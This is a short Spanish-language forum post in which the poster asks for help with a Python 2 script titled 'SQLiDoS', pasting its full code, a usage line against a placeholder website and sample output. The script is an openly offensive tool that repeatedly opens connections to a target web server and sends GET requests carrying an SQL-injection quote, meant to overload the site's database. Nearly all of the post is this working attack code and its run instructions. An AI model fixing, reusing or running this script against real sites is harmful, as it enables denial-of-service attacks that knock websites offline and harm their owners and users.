Cuando lo ejecuto no pasa nada en el terminal sale asi:
>
y no hace mas.... espero que me puedan ayudar
Código
#!/usr/bin/python # SQLiDoS - SQL Denial of Service import socket import sys if len(sys.argv) != 4: print "[+] Uso: SQLiDoS.py <Target Web> <SQLi Injection> <Connection Numbers>" sys.exit(1) def attack(): connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM) connection.connect((sys.argv[1], 80)) print "[+] GET /" + sys.argv[2] + " HTTP/1.1" connection.send("GET /" + sys.argv[2] + " HTTP/1.1\r\n") connection.send("Host: " + sys.argv[1] + "\r\n\r\n"); connection.close() Host = sys.argv[1] SQLi = sys.argv[2] CoNum = int(sys.argv[3]) print "[+] Connecting to %s" % (Host) print "[+] Injecting %s" % (SQLi) for i in range(1, CoNum+1): attack()
Como ejecutarlo:
Código
SQLiDoS.py www.sitioweb.com index.php?id=' 10
Funciona:
Código
[+] Connecting to www.sitioweb.com [+] Injecting index.php?id=' [+] GET /noticias.php?id=' HTTP/1.1 [+] GET /noticias.php?id=' HTTP/1.1 [+] GET /noticias.php?id=' HTTP/1.1 [+] GET /noticias.php?id=' HTTP/1.1 [+] GET /noticias.php?id=' HTTP/1.1 [+] GET /noticias.php?id=' HTTP/1.1 [+] GET /noticias.php?id=' HTTP/1.1 [+] GET /noticias.php?id=' HTTP/1.1 [+] GET /noticias.php?id=' HTTP/1.1 [+] GET /noticias.php?id=' HTTP/1.1
Les agradezco la ayuda de antemano!
saludos